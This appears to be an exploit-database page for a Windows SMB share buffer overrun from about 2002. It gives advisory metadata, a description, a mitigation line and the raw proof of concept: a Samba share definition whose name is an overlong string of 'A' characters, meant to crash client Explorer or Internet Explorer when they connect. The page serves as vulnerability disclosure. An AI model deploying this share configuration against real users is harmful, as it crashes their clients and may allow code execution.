Microsoft Windows SMB Share Buffer Overrun Vulnerability

vendor:

Windows

by:

SecurityFocus

7.5

CVSS

HIGH

Buffer Overrun

120

CWE

Product Name: Windows

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2002

Microsoft Windows SMB Share Buffer Overrun Vulnerability

Microsoft Windows operating systems have been reported to be prone to a remotely exploitable buffer overrun condition. This issue is exposed when a client attempts to connect to an SMB share with an overly long name. This may cause explorer.exe or Internet Explorer to crash but could also potentially be leveraged to execute arbitrary code as the client user.

Mitigation:

Ensure that all SMB shares are configured with appropriate access control lists and that overly long names are not used.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10213/info

Microsoft Windows operating systems have been reported to be prone to a remotely exploitable buffer overrun condition. 

This issue is exposed when a client attempts to connect to an SMB share with an overly long name. This may cause explorer.exe or Internet Explorer to crash but could also potentially be leveraged to execute arbitrary code as the client user.

[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
comment = Area 51
path = /tmp/testfolder
public = yes
writable = yes
printable = no
browseable = yes
write list = @trymywingchung